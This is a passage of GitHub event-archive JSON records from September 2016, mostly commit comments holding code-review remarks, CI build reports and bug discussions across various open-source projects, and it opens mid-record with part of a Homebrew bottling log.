FAILED\r\nError: No such file or directory - ==> Bottling pygobject-2.28.6_1.sierra.bottle.tar.gz...\r\n/usr/bin/touch -h -t 201106131735.44 /usr/local/Cellar/pygobject/2.28.6_1/lib/libpyglib-2.0-python.dylib\r\ntar cf /Users/brew/Jenkins/testing-10-11/version/sierra_2/pygobject-2.28.6_1.sierra.bottle.tar pygobject/2.28.6_1\r\ngzip -f pygobject-bottle.tar\r\nnil\r\n\"https://homebrew.bintray.com/bottles\"\r\n\"https://homebrew.bintray.com/bottles\"\r\n./pygobject-2.28.6_1.sierra.bottle.json\r\n  bottle do\r\n    cellar :any\r\n    sha256 \"9a10d979f637cfc9abc46839fa470672ee97a33be5f8ea9a8b725d44f60ed0ba\" => :sierra\r\n  end\r\n```\r\n\r\nThere may be more to the story?"}},"created_at":"2016-09-12T09:01:25Z"}
{"id":"4548110167","type":"CommitCommentEvent","actor":{"login":"trusktr"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18981671,"position":24,"line":2362,"path":"src/nvim/normal.c","commit_id":"c6f5d6b7e0f274a245cecd80c480212d399df9d4","created_at":"2016-09-12T09:01:58Z","updated_at":"2016-09-12T09:01:58Z","body":"it should work based on horizontal position of the mouse even if *not* in the tab line."}},"created_at":"2016-09-12T09:01:58Z"}
{"id":"4548115469","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981677,"position":33,"line":29,"path":"numberToTextConverter/src/main/java/com/spark/NumberToTextConverter.java","commit_id":"a9da242d5b89d6bb68d706505c459c2261142d11","created_at":"2016-09-12T09:03:07Z","updated_at":"2016-09-12T09:03:07Z","body":"why is this public ??"}},"created_at":"2016-09-12T09:03:07Z"}
{"id":"4548119636","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981687,"position":null,"line":null,"path":null,"commit_id":"a9da242d5b89d6bb68d706505c459c2261142d11","created_at":"2016-09-12T09:04:03Z","updated_at":"2016-09-12T09:04:03Z","body":"this isnt refactoring. Refactoring means movement which makes sense and which gives the code a little structure. Here you have just shifted the weight from a single method to another method but I am not sure how it is giving the code more structure.."}},"created_at":"2016-09-12T09:04:03Z"}
{"id":"4548120708","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981688,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:04:18Z","updated_at":"2016-09-12T09:04:18Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-success-brightgreen.svg)](#)\n"}},"created_at":"2016-09-12T09:04:18Z"}
{"id":"4548123776","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981693,"position":24,"line":34,"path":"numberToTextConverter/src/main/java/com/spark/NumberToTextConverter.java","commit_id":"1dd8c11cbd55027bbab57d88882fcb191fda0cd8","created_at":"2016-09-12T09:04:57Z","updated_at":"2016-09-12T09:04:57Z","body":"again the comments around how this is **not refactoring** apply. you have simply moved code around. this isnt refactoring. \r\n\r\nalso why is the method public"}},"created_at":"2016-09-12T09:04:57Z"}
{"id":"4548124194","type":"CommitCommentEvent","actor":{"login":"LiliC"},"repo":{"name":"kinvolk/mountinfo-graph"},"payload":{"comment":{"id":18981694,"position":13,"line":31,"path":"read-file.go","commit_id":"7c2186a7a4101ce974acc7947a8d84f9424b30c8","created_at":"2016-09-12T09:05:03Z","updated_at":"2016-09-12T09:05:03Z","body":"@alepuccetti makes sense to me, do you have any suggestions? Come to think of it, not sure that `mountinfoFile` is right here anyways... wdyt?"}},"created_at":"2016-09-12T09:05:03Z"}
{"id":"4548126855","type":"CommitCommentEvent","actor":{"login":"pjsong"},"repo":{"name":"pjsong/angular2-hero-steps"},"payload":{"comment":{"id":18981701,"position":56,"line":82,"path":"app/app.component.ts","commit_id":"6d6a6f563f1ebcb1bf0129a9faa88889b8102d36","created_at":"2016-09-12T09:05:38Z","updated_at":"2016-09-12T09:05:38Z","body":"Initialize after Angular initializes the data-bound input properties."}},"created_at":"2016-09-12T09:05:38Z"}
{"id":"4548128773","type":"CommitCommentEvent","actor":{"login":"Ludovicus"},"repo":{"name":"Ludovicus/WoW-Pro-Guides"},"payload":{"comment":{"id":18981703,"position":null,"line":null,"path":null,"commit_id":"b644dc79f9b223b2756b5f8cd231d27f0a9a8bed","created_at":"2016-09-12T09:06:04Z","updated_at":"2016-09-12T09:06:04Z","body":"Reasonable.  Message updated to `Skip %s [%s] because player level %d is too high.`"}},"created_at":"2016-09-12T09:06:04Z"}
{"id":"4548129146","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18981704,"position":null,"line":null,"path":null,"commit_id":"65454165c4f2311965a9fe30f06fa59bf3349e42","created_at":"2016-09-12T09:06:10Z","updated_at":"2016-09-12T09:06:10Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-12T09:06:10Z"}
{"id":"4548129162","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18981705,"position":null,"line":null,"path":null,"commit_id":"9a31869414e0c215788f15935d3823e582dbb632","created_at":"2016-09-12T09:06:10Z","updated_at":"2016-09-12T09:06:10Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-12T09:06:10Z"}
{"id":"4548129171","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18981706,"position":null,"line":null,"path":null,"commit_id":"3978813e8e90af55779ccb72850e813c0d667fde","created_at":"2016-09-12T09:06:11Z","updated_at":"2016-09-12T09:06:11Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-12T09:06:11Z"}
{"id":"4548129183","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18981707,"position":null,"line":null,"path":null,"commit_id":"7d8aa3e2ee088efe17e4f686a288189940aec76c","created_at":"2016-09-12T09:06:11Z","updated_at":"2016-09-12T09:06:11Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-12T09:06:11Z"}
{"id":"4548132985","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981718,"position":null,"line":null,"path":null,"commit_id":"bf1823ef301824b35e0fff630820f2896ac65c10","created_at":"2016-09-12T09:07:01Z","updated_at":"2016-09-12T09:07:01Z","body":"This is the **worst** step in the whole process. Why did you introduce a util class. I dont get it. PLease avoid statics.. \r\n\r\n"}},"created_at":"2016-09-12T09:07:01Z"}
{"id":"4548134778","type":"CommitCommentEvent","actor":{"login":"tplavcic"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18981724,"position":7,"line":7,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T09:07:27Z","updated_at":"2016-09-12T09:07:27Z","body":"If this really should be user configurable we probably don't want user to edit the script, so possibly this should be set as default and added into options for user to change when starting script?"}},"created_at":"2016-09-12T09:07:27Z"}
{"id":"4548139361","type":"CommitCommentEvent","actor":{"login":"fousa"},"repo":{"name":"icapps/ios-faro"},"payload":{"comment":{"id":18981729,"position":null,"line":null,"path":null,"commit_id":"b0d34687a58f86b5fcd02474ca5181445b61127c","created_at":"2016-09-12T09:08:26Z","updated_at":"2016-09-12T09:08:26Z","body":"With Swift 3 we can eventually do `request(with configuration: Configuration)`. \r\n\r\nBut that is for in a few weeks."}},"created_at":"2016-09-12T09:08:26Z"}
{"id":"4548139852","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18981730,"position":null,"line":null,"path":null,"commit_id":"fe9f79780e1a6dd14e0876dca54ef4d8c8a0a5ae","created_at":"2016-09-12T09:08:33Z","updated_at":"2016-09-12T09:08:33Z","body":"I understand from https://github.com/TrinityCore/TrinityCore/commit/9250680680399e986736786bb6c3c2ff97ca5b9c that this commit wasn't tested (so it might even crash when trying to log the error) ?"}},"created_at":"2016-09-12T09:08:33Z"}
{"id":"4548140938","type":"CommitCommentEvent","actor":{"login":"LiliC"},"repo":{"name":"kinvolk/mountinfo-graph"},"payload":{"comment":{"id":18981732,"position":13,"line":31,"path":"read-file.go","commit_id":"7c2186a7a4101ce974acc7947a8d84f9424b30c8","created_at":"2016-09-12T09:08:49Z","updated_at":"2016-09-12T09:08:49Z","body":"@alepuccetti wdyt of `reader io.Reader`?"}},"created_at":"2016-09-12T09:08:49Z"}
{"id":"4548141702","type":"CommitCommentEvent","actor":{"login":"oostmeijer"},"repo":{"name":"angular-ui/bower-ui-grid"},"payload":{"comment":{"id":18981734,"position":16,"line":10,"path":"bower.json","commit_id":"3813e11f2a2f3ffb4eb4d44f642e6176eaa4c285","created_at":"2016-09-12T09:08:59Z","updated_at":"2016-09-12T09:08:59Z","body":"why add the minified version and the js file? Now both are included in my index.html..."}},"created_at":"2016-09-12T09:08:59Z"}
{"id":"4548142006","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981735,"position":null,"line":null,"path":null,"commit_id":"bf1823ef301824b35e0fff630820f2896ac65c10","created_at":"2016-09-12T09:09:04Z","updated_at":"2016-09-12T09:09:04Z","body":"As far as I can tell there are some sembelance of TDD but the code misses on 2 big aspects \r\n\r\n* lack of structures or design pattersns. Your main class method `convertToText` is growing with if/else loops but you havent done anything to address the gloat.\r\n* this static helper class at the very end. \r\n\r\nwe can talk a little more about it during our call today "}},"created_at":"2016-09-12T09:09:04Z"}
{"id":"4548142775","type":"CommitCommentEvent","actor":{"login":"limjh16"},"repo":{"name":"TipsyOs/frameworks_opt_telephony"},"payload":{"comment":{"id":18981737,"position":null,"line":null,"path":null,"commit_id":"76d3e8f11fc84f198f2abbebd9195920336abc56","created_at":"2016-09-12T09:09:15Z","updated_at":"2016-09-12T09:09:15Z","body":"alright, will take note of that in the future. "}},"created_at":"2016-09-12T09:09:15Z"}
{"id":"4548145434","type":"CommitCommentEvent","actor":{"login":"gfwilliams"},"repo":{"name":"owenmcateer/Espruino"},"payload":{"comment":{"id":18981741,"position":null,"line":null,"path":null,"commit_id":"02d04664967d654ea7856aa88d1aabd5168fa27d","created_at":"2016-09-12T09:09:50Z","updated_at":"2016-09-12T09:09:50Z","body":"Hi - please can you issue this as a PR, or is it ok if I pull this commit into the main Espruino repo myself?\r\n\r\nthanks!"}},"created_at":"2016-09-12T09:09:50Z"}
{"id":"4548146829","type":"CommitCommentEvent","actor":{"login":"UpdateYourCode"},"repo":{"name":"mattoufoutu/armitage"},"payload":{"comment":{"id":18981749,"position":null,"line":null,"path":null,"commit_id":"b31b314f31dbe105fc20ba38f3bc18b9869d9141","created_at":"2016-09-12T09:10:08Z","updated_at":"2016-09-12T09:10:08Z","body":"after 2.5 months this is still not fixed :-1: "}},"created_at":"2016-09-12T09:10:08Z"}
{"id":"4548149975","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"SchizoDuckie/DuckieTV"},"payload":{"comment":{"id":18981755,"position":null,"line":null,"path":null,"commit_id":"814efd1dcb144abf6df395e643eaae366e22efe4","created_at":"2016-09-12T09:10:48Z","updated_at":"2016-09-12T09:10:48Z","body":"Weird that the GitHub diff doesn't show any change apart from the version. Did it actually change?"}},"created_at":"2016-09-12T09:10:48Z"}
{"id":"4548157093","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18981763,"position":null,"line":null,"path":null,"commit_id":"953c770e3a750f8974d782b0c91a25a2e2054014","created_at":"2016-09-12T09:12:23Z","updated_at":"2016-09-12T09:12:23Z","body":"oops, this was to fix ceylon/ceylon-ide-common#72"}},"created_at":"2016-09-12T09:12:23Z"}
{"id":"4548160192","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18981764,"position":null,"line":null,"path":null,"commit_id":"6530a6d8ebbdadbc45fe279102ff49ddb73d043d","created_at":"2016-09-12T09:13:04Z","updated_at":"2016-09-12T09:13:04Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 236](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1192&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:25:45"}},"created_at":"2016-09-12T09:13:04Z"}
{"id":"4548160227","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18981765,"position":null,"line":null,"path":null,"commit_id":"fafb87f1fdd33b853612d40fc472b0e48c9ac5e6","created_at":"2016-09-12T09:13:05Z","updated_at":"2016-09-12T09:13:05Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 237](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1193&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T09:13:05Z"}
{"id":"4548163187","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18981768,"position":48,"line":48,"path":"app/code/local/Oggetto/Payment/Helper/Data.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T09:13:41Z","updated_at":"2016-09-12T09:13:41Z","body":"вместо array() можно использовать просто []"}},"created_at":"2016-09-12T09:13:41Z"}
{"id":"4548163906","type":"CommitCommentEvent","actor":{"login":"ilozano2"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18981771,"position":null,"line":null,"path":null,"commit_id":"939a3672d4c2f65a6c8d04ebe7cacb621d8a1485","created_at":"2016-09-12T09:13:49Z","updated_at":"2016-09-12T09:13:49Z","body":"Why the \"new\" (is_newish) tag feature was removed? :-1: "}},"created_at":"2016-09-12T09:13:49Z"}
{"id":"4548165989","type":"CommitCommentEvent","actor":{"login":"FabienANDREINI"},"repo":{"name":"Azure/azure-content"},"payload":{"comment":{"id":18981773,"position":null,"line":null,"path":null,"commit_id":"aa6e9db7fa2161a75e72ceed1f4b8d6759b77926","created_at":"2016-09-12T09:14:18Z","updated_at":"2016-09-12T09:14:18Z","body":"Azure Web Apps also requires TCP 989 for implicit FTPS (from Azure Support guidance) and the data channels range is larger: 10001-10**300** (validated using Wireshark).\r\nI didn't test against ASE though, but I assume it's the same range.\r\n"}},"created_at":"2016-09-12T09:14:18Z"}
{"id":"4548166928","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981780,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:14:30Z","updated_at":"2016-09-12T09:14:30Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-All%202%20tests%20passed-brightgreen.svg)](#)\n[![UnitTests](https://img.shields.io/badge/coverage-0.00-lightgrey.svg)](#)\n"}},"created_at":"2016-09-12T09:14:30Z"}
{"id":"4548172444","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981789,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:15:43Z","updated_at":"2016-09-12T09:15:43Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-All%202%20tests%20passed-brightgreen.svg)](#)\n[![UnitTests](https://img.shields.io/badge/coverage-0.00-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:15:43Z"}
{"id":"4548177218","type":"CommitCommentEvent","actor":{"login":"garfield69"},"repo":{"name":"SchizoDuckie/DuckieTV"},"payload":{"comment":{"id":18981796,"position":null,"line":null,"path":null,"commit_id":"814efd1dcb144abf6df395e643eaae366e22efe4","created_at":"2016-09-12T09:16:45Z","updated_at":"2016-09-12T09:16:45Z","body":"Hah, busted.\n\nTurns out you had already updated the code back in march. :-D\n\n \n\n  _____  \n\nFrom: Js41637 ftw [mailto:notifications@github.com] \nSent: Monday, 12 September 2016 21:11\nTo: SchizoDuckie/DuckieTV\nCc: garfield69; Author\nSubject: Re: [SchizoDuckie/DuckieTV] update translate-once to 1.0.4\n(814efd1)\n\n \n\nWeird that the GitHub diff doesn't show any change apart from the version.\nDid it actually change?\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view\n<https://github.com/SchizoDuckie/DuckieTV/commit/814efd1dcb144abf6df395e643e\naae366e22efe4#commitcomment-18981755>  it on GitHub, or mute\n<https://github.com/notifications/unsubscribe-auth/AGnK-C1JfAaBcW1kmNQVMc8me\nry5iaSAks5qpRcZgaJpZM4J6YN->  the thread.\n<https://github.com/notifications/beacon/AGnK-AAqJGtZU2X1yJK0qdTMpjo1nkWJks5\nqpRcZgaJpZM4J6YN-.gif> \n\n\n \n\n"}},"created_at":"2016-09-12T09:16:45Z"}
{"id":"4548179958","type":"CommitCommentEvent","actor":{"login":"mattoufoutu"},"repo":{"name":"mattoufoutu/armitage"},"payload":{"comment":{"id":18981804,"position":null,"line":null,"path":null,"commit_id":"b31b314f31dbe105fc20ba38f3bc18b9869d9141","created_at":"2016-09-12T09:17:20Z","updated_at":"2016-09-12T09:17:20Z","body":"@UpdateYourCode for me it is fixed, like you can see here it works: https://github.com/rsmudge/armitage/issues/192#issuecomment-233114851\nIf it doesn't please provide more details than \"doesn't work\". "}},"created_at":"2016-09-12T09:17:20Z"}
{"id":"4548180205","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18981805,"position":50,"line":50,"path":"app/code/local/Oggetto/Payment/Helper/Data.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T09:17:23Z","updated_at":"2016-09-12T09:17:23Z","body":"что значит $x, имя переменной должно соответствовать своему назначению"}},"created_at":"2016-09-12T09:17:23Z"}
{"id":"4548180545","type":"CommitCommentEvent","actor":{"login":"goetas"},"repo":{"name":"schmittjoh/serializer"},"payload":{"comment":{"id":18981807,"position":null,"line":null,"path":null,"commit_id":"774d4fc41d16b013e2e851596c4c697a663d4952","created_at":"2016-09-12T09:17:27Z","updated_at":"2016-09-12T09:17:27Z","body":"> I'm also not sure if we have something in the benchmark which uses groups, but just my feeling from looking at the PR is that we have some more loops to go through for each property.\r\n\r\n\r\nOn properties that have no groups defined, now there are mainly:  `in_array` calls,  previously were `isset`.\r\nThis in general should impact on performance, but since the array used as haystack is \"small\" (generally no body uses hundreds of groups), there is not a visibile difference.\r\n`in_array` vs `isset` starts to be different if the haystack array has more than 16 items http://maettig.com/images/php-array-key-exists-benchmark1.png\r\n\r\nOn properties that have groups defined, `Context::getCurrentPath()`  is executed for each property. This can effectively impact pn performance when having a lot of items into a deep graph.\r\nProbably the performance impact is not visible form the benchmark because the benchmark uses a not-deep object graph.\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-12T09:17:27Z"}
{"id":"4548180886","type":"CommitCommentEvent","actor":{"login":"socketpair"},"repo":{"name":"python/asyncio"},"payload":{"comment":{"id":18981808,"position":6,"line":44,"path":"asyncio/selector_events.py","commit_id":"bea3a4247a450be7fb82dec111429bb2752aac4d","created_at":"2016-09-12T09:17:32Z","updated_at":"2016-09-12T09:17:32Z","body":"`set` is slightly slower than `tuple`, since it will be built on each `_set_nodelay()` call. It is faster to lookup in tuple. So jut replace curl braces with `(` `)`."}},"created_at":"2016-09-12T09:17:32Z"}
{"id":"4548185117","type":"CommitCommentEvent","actor":{"login":"alexcu"},"repo":{"name":"splashkit/splashkit-translator"},"payload":{"comment":{"id":18981814,"position":6,"line":316,"path":"src/parser.rb","commit_id":"d952ff850f26716be8e9981baeaa02af52ab0e2a","created_at":"2016-09-12T09:18:28Z","updated_at":"2016-09-12T09:18:28Z","body":"Could we use xpath for this? What does the `p` in `type_p` stand for?"}},"created_at":"2016-09-12T09:18:28Z"}
{"id":"4548186864","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18981816,"position":78,"line":78,"path":"app/code/local/Oggetto/Payment/Helper/Data.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T09:18:51Z","updated_at":"2016-09-12T09:18:51Z","body":"можно написать в одну строчку:\r\n\r\nMage::getModel('sales/order')->loadByIncrementId(Mage::getSingleton('checkout/session')->getLastRealOrderId());\r\n"}},"created_at":"2016-09-12T09:18:51Z"}
{"id":"4548188641","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981823,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:19:15Z","updated_at":"2016-09-12T09:19:15Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-All%202%20tests%20passed-brightgreen.svg)](#)\n[![UnitTests](https://img.shields.io/badge/coverage-7.16-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:19:15Z"}
{"id":"4548188886","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18981824,"position":86,"line":86,"path":"app/code/local/Oggetto/Payment/Helper/Data.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T09:19:18Z","updated_at":"2016-09-12T09:19:18Z","body":"для чего str_replace ?"}},"created_at":"2016-09-12T09:19:18Z"}
{"id":"4548191990","type":"CommitCommentEvent","actor":{"login":"richardjgowers"},"repo":{"name":"MDAnalysis/mdanalysis"},"payload":{"comment":{"id":18981830,"position":5,"line":5054,"path":"package/MDAnalysis/core/AtomGroup.py","commit_id":"2637a20e360978038287f9b52b336a9836c53833","created_at":"2016-09-12T09:19:59Z","updated_at":"2016-09-12T09:19:59Z","body":"So this will become `trajectory.format != 'MEMORY'`"}},"created_at":"2016-09-12T09:19:59Z"}
{"id":"4548192448","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18981831,"position":105,"line":105,"path":"app/code/local/Oggetto/Payment/Helper/Data.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T09:20:05Z","updated_at":"2016-09-12T09:20:05Z","body":"что за магическое число 200? вынеси в константу"}},"created_at":"2016-09-12T09:20:05Z"}
{"id":"4548192813","type":"CommitCommentEvent","actor":{"login":"AlexandriaWu"},"repo":{"name":"AlexandriaWu/helloword"},"payload":{"comment":{"id":18981833,"position":1,"line":1,"path":"README.md","commit_id":"b0c41c5d7627d9fc8e3befd8389ed31727aab390","created_at":"2016-09-12T09:20:12Z","updated_at":"2016-09-12T09:20:12Z","body":"<i>ww</i>"}},"created_at":"2016-09-12T09:20:12Z"}
{"id":"4548193984","type":"CommitCommentEvent","actor":{"login":"kamalhakim"},"repo":{"name":"karamelchef/karamel"},"payload":{"comment":{"id":18981835,"position":null,"line":null,"path":null,"commit_id":"9cb6e87fa7e0a86268b3d3c085203ded4fb2d6aa","created_at":"2016-09-12T09:20:26Z","updated_at":"2016-09-12T09:20:26Z","body":"@jimdowling I am testing it now again.. "}},"created_at":"2016-09-12T09:20:26Z"}
{"id":"4548194436","type":"CommitCommentEvent","actor":{"login":"AlexandriaWu"},"repo":{"name":"AlexandriaWu/helloword"},"payload":{"comment":{"id":18981836,"position":null,"line":null,"path":null,"commit_id":"b0c41c5d7627d9fc8e3befd8389ed31727aab390","created_at":"2016-09-12T09:20:31Z","updated_at":"2016-09-12T09:20:31Z","body":"are you "}},"created_at":"2016-09-12T09:20:31Z"}
{"id":"4548196038","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18981839,"position":106,"line":106,"path":"app/code/local/Oggetto/Payment/Helper/Data.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T09:20:50Z","updated_at":"2016-09-12T09:20:50Z","body":"получение ордера лучше вынести в отдельный метод "}},"created_at":"2016-09-12T09:20:50Z"}
{"id":"4548197108","type":"CommitCommentEvent","actor":{"login":"AlexandriaWu"},"repo":{"name":"AlexandriaWu/helloword"},"payload":{"comment":{"id":18981840,"position":null,"line":null,"path":null,"commit_id":"b0c41c5d7627d9fc8e3befd8389ed31727aab390","created_at":"2016-09-12T09:21:06Z","updated_at":"2016-09-12T09:21:06Z","body":"w"}},"created_at":"2016-09-12T09:21:06Z"}
{"id":"4548197973","type":"CommitCommentEvent","actor":{"login":"AlexandriaWu"},"repo":{"name":"AlexandriaWu/helloword"},"payload":{"comment":{"id":18981842,"position":1,"line":1,"path":"README.md","commit_id":"b0c41c5d7627d9fc8e3befd8389ed31727aab390","created_at":"2016-09-12T09:21:16Z","updated_at":"2016-09-12T09:21:16Z","body":"ww"}},"created_at":"2016-09-12T09:21:16Z"}
{"id":"4548198556","type":"CommitCommentEvent","actor":{"login":"sweety1122"},"repo":{"name":"Sudheer1989/AndroidJson"},"payload":{"comment":{"id":18981844,"position":null,"line":null,"path":null,"commit_id":"3b11b4c96f3cfe7d020ce360476803c8c5bee7cb","created_at":"2016-09-12T09:21:24Z","updated_at":"2016-09-12T09:21:24Z","body":"nice "}},"created_at":"2016-09-12T09:21:24Z"}
{"id":"4548200274","type":"CommitCommentEvent","actor":{"login":"dkovalev"},"repo":{"name":"AASavelyev/FirstMagentoProject"},"payload":{"comment":{"id":18981848,"position":108,"line":108,"path":"app/code/local/Oggetto/Payment/Helper/Data.php","commit_id":"b5f2773ae7f70c478d45dbe587743a7ae820b3e3","created_at":"2016-09-12T09:21:47Z","updated_at":"2016-09-12T09:21:47Z","body":"Mage::getModel('sales/order')->load($postData['order_id'])\r\n\r\nв любом случае вернет объект, поэтому проверка не корректна "}},"created_at":"2016-09-12T09:21:47Z"}
{"id":"4548201492","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"SchizoDuckie/DuckieTV"},"payload":{"comment":{"id":18981852,"position":null,"line":null,"path":null,"commit_id":"814efd1dcb144abf6df395e643eaae366e22efe4","created_at":"2016-09-12T09:22:04Z","updated_at":"2016-09-12T09:22:04Z","body":"I did?"}},"created_at":"2016-09-12T09:22:04Z"}
{"id":"4548201989","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Civcraft/NameLayer"},"payload":{"comment":{"id":18981854,"position":null,"line":null,"path":null,"commit_id":"e6270af6c986010013204ac8eaba67c13c535d90","created_at":"2016-09-12T09:22:12Z","updated_at":"2016-09-12T09:22:12Z","body":"Is this a failed rebase or what happened here?"}},"created_at":"2016-09-12T09:22:12Z"}
{"id":"4548202964","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981856,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:22:25Z","updated_at":"2016-09-12T09:22:25Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-%282%20/%202%29%20passed-brightgreen.svg)](#)\n[![UnitTests](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:22:25Z"}
{"id":"4548205995","type":"CommitCommentEvent","actor":{"login":"Abbe98"},"repo":{"name":"addwiki/wikibase-api"},"payload":{"comment":{"id":18981866,"position":null,"line":null,"path":null,"commit_id":"dc5eeb7196bca28b6c886df820f9cfa9c3b96caa","created_at":"2016-09-12T09:23:04Z","updated_at":"2016-09-12T09:23:04Z","body":"Thanks! I was searching the code to figure out things yesterday...\r\n\r\nAny plans on providing actual documentation? "}},"created_at":"2016-09-12T09:23:04Z"}
{"id":"4548206672","type":"CommitCommentEvent","actor":{"login":"UpdateYourCode"},"repo":{"name":"mattoufoutu/armitage"},"payload":{"comment":{"id":18981870,"position":null,"line":null,"path":null,"commit_id":"b31b314f31dbe105fc20ba38f3bc18b9869d9141","created_at":"2016-09-12T09:23:14Z","updated_at":"2016-09-12T09:23:14Z","body":"Sorry. It is still having the same issues with http_version picking up the wrong RHOSTS values on Kali 2016.2 x64\r\n\r\nIt shows an old Aug 2015 version of Armitage 1.4.11, which is probably why its broken.\r\n\r\nApologize for the assumption that it had not been fixed."}},"created_at":"2016-09-12T09:23:14Z"}
